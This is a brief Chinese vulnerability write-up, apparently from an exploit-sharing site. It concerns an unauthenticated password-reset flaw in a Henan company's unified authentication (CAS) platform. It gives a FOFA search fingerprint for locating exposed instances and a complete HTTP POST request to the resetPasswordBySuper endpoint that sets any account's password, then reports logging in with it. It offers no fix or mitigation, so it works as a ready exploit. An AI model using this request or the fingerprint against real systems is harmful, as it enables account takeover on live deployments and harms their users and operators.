登录 白背景

河南省风速科技统一认证平台存在密码重置漏洞

一、漏洞简介

河南省风速科技统一认证平台,存在未授权漏洞,攻击者可通过该接口重置任意密码。

二、影响版本

  • 河南省风速科技统一认证平台

三、资产测绘

  • fofabody="/cas/themes/zbvc/js/jquery.min.js"
  • 特征

image.png

四、漏洞复现

POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

image.png
使用重置后的密码成功登录系统
image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/xdo3pe6wi7eanir5